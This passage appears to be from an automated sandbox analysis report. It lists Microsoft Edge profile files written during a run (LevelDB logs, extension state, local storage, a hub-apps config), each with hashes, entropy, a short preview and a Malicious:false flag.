                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.168832279455654
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43Zvlyq2PcNwi23oH+Tcwt8aPrqIFUtL43Mj1Zmwl43M1RkwOcNwi23oH+TcD:7p43ryvLZYebL3FUtL43MJ/l43M1R546
                                                                                                                                                                                                                                                                                                MD5:40D533A76230622C5FBA804CA38017B3
                                                                                                                                                                                                                                                                                                SHA1:12C3467921B194977ADD3D8192931B29107EA3CA
                                                                                                                                                                                                                                                                                                SHA-256:DCA7F9B48BCF0CE2A4B1FC5965540BB975759639D84170A063C870364F1A3878
                                                                                                                                                                                                                                                                                                SHA-512:5AFF36A72C999E204EECDDDCFC8BE4D4141F385FE67B9171434A68668BB6D6F8B96B72EEEF5F121A25DF64964EA2DA4A39F7567445BEEDE81D23F082B668F439
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.954 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/07-07:19:02.955 a74 Recovering log #3.2025/01/07-07:19:02.955 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190031854648643
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43uVF31yq2PcNwi23oH+Tcwt865IFUtL41R11Zmwl4t1RkwOcNwi23oH+Tcwx:7p43uVFlyvLZYeb/WFUtL4bX/l4t1R5G
                                                                                                                                                                                                                                                                                                MD5:A00E5DD6E94AAF03B6D41966E4D71A5C
                                                                                                                                                                                                                                                                                                SHA1:788A96E1F05EF61D738AFF081622D625BE0A629C
                                                                                                                                                                                                                                                                                                SHA-256:AAF0C2228C15A78BBDEDDABD7B50414232913E12600E1B21C5B7B60DF8E56CC5
                                                                                                                                                                                                                                                                                                SHA-512:85E1980E0433E57CBF1FD7A6D791406DD9802DEDAE154C7E4F31CE2FB9E93C8733255FFD9FDA98429675A74218270054A0EC515AF991228111E71AD36AEA5C5E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.960 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/07-07:19:03.083 a74 Recovering log #3.2025/01/07-07:19:03.087 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190031854648643
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43uVF31yq2PcNwi23oH+Tcwt865IFUtL41R11Zmwl4t1RkwOcNwi23oH+Tcwx:7p43uVFlyvLZYeb/WFUtL4bX/l4t1R5G
                                                                                                                                                                                                                                                                                                MD5:A00E5DD6E94AAF03B6D41966E4D71A5C
                                                                                                                                                                                                                                                                                                SHA1:788A96E1F05EF61D738AFF081622D625BE0A629C
                                                                                                                                                                                                                                                                                                SHA-256:AAF0C2228C15A78BBDEDDABD7B50414232913E12600E1B21C5B7B60DF8E56CC5
                                                                                                                                                                                                                                                                                                SHA-512:85E1980E0433E57CBF1FD7A6D791406DD9802DEDAE154C7E4F31CE2FB9E93C8733255FFD9FDA98429675A74218270054A0EC515AF991228111E71AD36AEA5C5E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.960 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/07-07:19:03.083 a74 Recovering log #3.2025/01/07-07:19:03.087 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.136084345419576
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp48+q2PcNwi23oH+Tcwt8NIFUtL4hWZmwl4Oa9VkwOcNwi23oH+Tcwt8+eLJ:7p48+vLZYebpFUtL4hW/l4ZV54ZYebqJ
                                                                                                                                                                                                                                                                                                MD5:DC9728EBA5F02EC1FC8674F9F7E7C918
                                                                                                                                                                                                                                                                                                SHA1:5BF55690C04EEA20D554960E7B6756F9EEBAE4A3
                                                                                                                                                                                                                                                                                                SHA-256:CBC4E44C982F5F9F8716059F904AF86E6C09E60BED0110032CCB2B21A45330F5
                                                                                                                                                                                                                                                                                                SHA-512:FCB027AEEE53B0ECBF0E3F5DB6D6E22BCBB33DC566F1F2997EA0C701B83E6BD29570879AC88E6887EC28B3D77B83054444C10DAC03A10FD327BDC8D834EA1DF7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.704 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/07-07:19:03.704 a3c Recovering log #3.2025/01/07-07:19:03.705 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.136084345419576
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp48+q2PcNwi23oH+Tcwt8NIFUtL4hWZmwl4Oa9VkwOcNwi23oH+Tcwt8+eLJ:7p48+vLZYebpFUtL4hW/l4ZV54ZYebqJ
                                                                                                                                                                                                                                                                                                MD5:DC9728EBA5F02EC1FC8674F9F7E7C918
                                                                                                                                                                                                                                                                                                SHA1:5BF55690C04EEA20D554960E7B6756F9EEBAE4A3
                                                                                                                                                                                                                                                                                                SHA-256:CBC4E44C982F5F9F8716059F904AF86E6C09E60BED0110032CCB2B21A45330F5
                                                                                                                                                                                                                                                                                                SHA-512:FCB027AEEE53B0ECBF0E3F5DB6D6E22BCBB33DC566F1F2997EA0C701B83E6BD29570879AC88E6887EC28B3D77B83054444C10DAC03A10FD327BDC8D834EA1DF7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.704 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/07-07:19:03.704 a3c Recovering log #3.2025/01/07-07:19:03.705 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.21822857380901528
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:uq/DllntFlljq7A/mhWJFuQ3yy7IOWUQe/nol/dweytllrE9SFcTp4AGbNCV9RU5:uok75fOXvol/d0Xi99pEYu1n
                                                                                                                                                                                                                                                                                                MD5:565722909CA4CA154FB6340FD34E4491
                                                                                                                                                                                                                                                                                                SHA1:06854745475B5F7D87022797439BB292E9DA6092
                                                                                                                                                                                                                                                                                                SHA-256:4330B532F4828C44DA2B38A1111E32DC01B8E33AD1C3079D588788CC716A18EE
                                                                                                                                                                                                                                                                                                SHA-512:2B1BB7729A9460A44FE6566E7F1BE91EF869EE6AC12AEF2FA9E52EB8DA2B9FA3B791D0F2BFE68B4878D6F622F9C310C7F384CE5AD72C8C7A0DB27D24496C535A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............5.o....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                                                MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                                                SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                                                SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                                                SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.243445970722836
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p423+vLZYeb8rcHEZrELFUtL4U2W/l4U9V54ZYeb8rcHEZrEZSJ:7WDlYeb8nZrExgEUAUVoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:A00A7BCE2BEA10E5E400563FBB231254
                                                                                                                                                                                                                                                                                                SHA1:0788AC7B692491D98E6DE10BF6026718F03EFD0C
                                                                                                                                                                                                                                                                                                SHA-256:F9A29E8BE652F2AB59434DB94870E47F252C3DCC96E5358770114B942750F26D
                                                                                                                                                                                                                                                                                                SHA-512:69244872249295884309E2A16DDA37F1DDCBA2812A192E22F5C87647C0E26909EE97927757E154033A27B6BA941E46058E9FB139DAA6B138818FA5B0662939E2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:09.559 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/07-07:19:09.560 a3c Recovering log #3.2025/01/07-07:19:09.560 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.243445970722836
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p423+vLZYeb8rcHEZrELFUtL4U2W/l4U9V54ZYeb8rcHEZrEZSJ:7WDlYeb8nZrExgEUAUVoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:A00A7BCE2BEA10E5E400563FBB231254
                                                                                                                                                                                                                                                                                                SHA1:0788AC7B692491D98E6DE10BF6026718F03EFD0C
                                                                                                                                                                                                                                                                                                SHA-256:F9A29E8BE652F2AB59434DB94870E47F252C3DCC96E5358770114B942750F26D
                                                                                                                                                                                                                                                                                                SHA-512:69244872249295884309E2A16DDA37F1DDCBA2812A192E22F5C87647C0E26909EE97927757E154033A27B6BA941E46058E9FB139DAA6B138818FA5B0662939E2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:09.559 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/07-07:19:09.560 a3c Recovering log #3.2025/01/07-07:19:09.560 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1661
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.636711375358271
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:3AtZxWYNc5ev2+6XZsJV03Sx4Lyls3ycUW7AHHk2GJ341:QtHpN+ev2+4GJ2osQxdP1
                                                                                                                                                                                                                                                                                                MD5:A2B5CE0AD2E744220F20B9F16436B0B8
                                                                                                                                                                                                                                                                                                SHA1:AA9C53C2D21D3863C0166E516F468AF244E5657F
                                                                                                                                                                                                                                                                                                SHA-256:768314D453453441060B2CB7A3ED92A5DF869771B35D763C85161E96F1B3470E
                                                                                                                                                                                                                                                                                                SHA-512:BA138E238A3AE476AA2D01B28102FF792C0852CCE63C109EAE79B36CE07E15306A4E84B02129CD368262AA91298FB21B9D666CF60F485E15A54A06C795F4A9FF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'..q:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1046}.!_https://ntp.msn.com..LastKnownPV..1736252351370.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736252353130.._https://ntp.msn.com..MUID!.040C031DFB13691C1F601670FA61685C.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736252351448,"schedule":[-1,-1,29,-1,-1,20,12],"scheduleFixed":[-1,-1,29,-1,-1,20,12],"simpleSchedule":[49,42,35,37,30,12,36]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736252351334.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250106.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_ht

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.144686961471085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4F44q2PcNwi23oH+Tcwt8a2jMGIFUtL4GOhZmwl4Bc3DkwOcNwi23oH+Tcwtw:7p4FnvLZYeb8EFUtL4t/l4BGD54ZYebw
                                                                                                                                                                                                                                                                                                MD5:0BAFCBC9B7F30C98337741D22F0F9C72
                                                                                                                                                                                                                                                                                                SHA1:53ECA080BE6AC382B14CD44E4FBC30F51822FEEB
                                                                                                                                                                                                                                                                                                SHA-256:FB572EDB9F2F3BC0DB83B3D52D2F0DC8325CF808469EA75D9796C9F363289CD7
                                                                                                                                                                                                                                                                                                SHA-512:EE269D46BF238B3154EE13BAB684F59FE00E3519F2AD7FC989BB2BC961B24992DF2FD2C112055C404FE844E37F858A12E085A41A8A415FED0341AAAAA72CC867
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.818 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.820 f70 Recovering log #3.2025/01/07-07:19:03.823 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.144686961471085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4F44q2PcNwi23oH+Tcwt8a2jMGIFUtL4GOhZmwl4Bc3DkwOcNwi23oH+Tcwtw:7p4FnvLZYeb8EFUtL4t/l4BGD54ZYebw
                                                                                                                                                                                                                                                                                                MD5:0BAFCBC9B7F30C98337741D22F0F9C72
                                                                                                                                                                                                                                                                                                SHA1:53ECA080BE6AC382B14CD44E4FBC30F51822FEEB
                                                                                                                                                                                                                                                                                                SHA-256:FB572EDB9F2F3BC0DB83B3D52D2F0DC8325CF808469EA75D9796C9F363289CD7
                                                                                                                                                                                                                                                                                                SHA-512:EE269D46BF238B3154EE13BAB684F59FE00E3519F2AD7FC989BB2BC961B24992DF2FD2C112055C404FE844E37F858A12E085A41A8A415FED0341AAAAA72CC867
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.818 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.820 f70 Recovering log #3.2025/01/07-07:19:03.823 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\18b62507-661a-4209-b3cc-746db0bc6d9b.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
